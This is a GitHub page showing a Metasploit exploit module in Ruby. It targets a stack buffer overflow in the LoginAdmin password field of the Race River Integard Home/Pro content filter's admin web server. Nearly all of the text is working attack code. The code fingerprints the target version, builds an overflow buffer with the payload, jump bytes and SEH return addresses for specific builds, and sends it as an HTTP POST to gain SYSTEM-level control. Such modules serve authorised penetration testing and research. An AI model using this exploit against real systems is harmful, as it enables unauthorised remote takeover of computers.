Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
metasploit-framework/modules/exploits/windows/http/integard_password_bof.rb /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
128 lines (112 sloc)
3.83 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = GreatRanking # stack bof, seh, universal ret, auto targeting | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow', | |
| 'Description' => %q{ | |
| This module exploits a stack buffer overflow in Race river's Integard Home/Pro | |
| internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are | |
| vulnerable. | |
| The administration web page on port 18881 is vulnerable to a remote buffer overflow | |
| attack. By sending a long character string in the password field, both the structured | |
| exception handler and the saved extended instruction pointer are over written, allowing | |
| an attacker to gain control of the application and the underlying operating system | |
| remotely. | |
| The administration website service runs with SYSTEM privileges, and automatically | |
| restarts when it crashes. | |
| }, | |
| 'Author' => | |
| [ | |
| 'Lincoln', # original discovery | |
| 'Nullthreat', | |
| 'rick2600', | |
| 'corelanc0d3r <peter.ve[at]corelan.be>', | |
| 'jduck' # fleshed out module from advisory | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| ['OSVDB', '67909'], | |
| ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'], | |
| ], | |
| 'DefaultOptions' => | |
| { | |
| 'EXITFUNC' => 'thread', | |
| }, | |
| 'Payload' => | |
| { | |
| 'Space' => 2000, | |
| 'BadChars' => "\x00\x20\x26\x2f\x3d\x3f\x5c", | |
| 'StackAdjustment' => -1500, | |
| }, | |
| 'Platform' => 'win', | |
| 'Privileged' => false, | |
| 'Targets' => | |
| [ | |
| [ 'Automatic Targeting', { 'auto' => true }], | |
| [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}], # p/p/r | |
| [ 'Integard Pro 2.2.0.9026', { 'Ret' => 0x0040362C,}], # p/p/r | |
| ], | |
| 'DefaultTarget' => 0, | |
| 'DisclosureDate' => '2010-09-07')) | |
| register_options( | |
| [ | |
| Opt::RPORT(18881) | |
| ]) | |
| end | |
| def exploit | |
| mytarget = nil | |
| if (target['auto']) | |
| print_status("Automatically detecting the target...") | |
| response = send_request_raw( | |
| { | |
| 'uri' => '/banner.jpg', | |
| 'version' => '1.1', | |
| 'method' => 'GET' | |
| }, 5) | |
| clen = 0 | |
| clen ||= response['Content-Length'].to_i if response and response['Content-Length'] | |
| case clen | |
| when 24584 | |
| print_status("[!] Found Version - Integard Home") | |
| mytarget = targets[1] | |
| when 23196 | |
| mytarget = targets[2] | |
| print_status("[!] Found Version - Integard Pro") | |
| end | |
| else | |
| mytarget = target | |
| end | |
| if not mytarget | |
| fail_with(Failure::NoTarget, "Unable to automatically detect the target version") | |
| end | |
| print_status("Selected Target: #{mytarget.name}") | |
| print_status("Building Buffer") | |
| pay = payload.encoded | |
| buffer = '' | |
| buffer << rand_text_alpha_upper(3091 - pay.length) | |
| buffer << pay | |
| buffer << "\xE9\x2B\xF8\xFF\xFF" | |
| buffer << "\xEB\xF9\x90\x90" | |
| buffer << [mytarget.ret].pack('V') | |
| print_status("Sending Request") | |
| send_request_raw({ | |
| 'uri' => '/LoginAdmin', | |
| 'version' => '1.1', | |
| 'method' => 'POST', | |
| 'headers' => | |
| { | |
| 'Host' => '192.168.1.1:18881', | |
| 'Content-Length' => 1074 | |
| }, | |
| 'data' => "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login" | |
| }, 5) | |
| print_status("Request Sent") | |
| handler | |
| end | |
| end |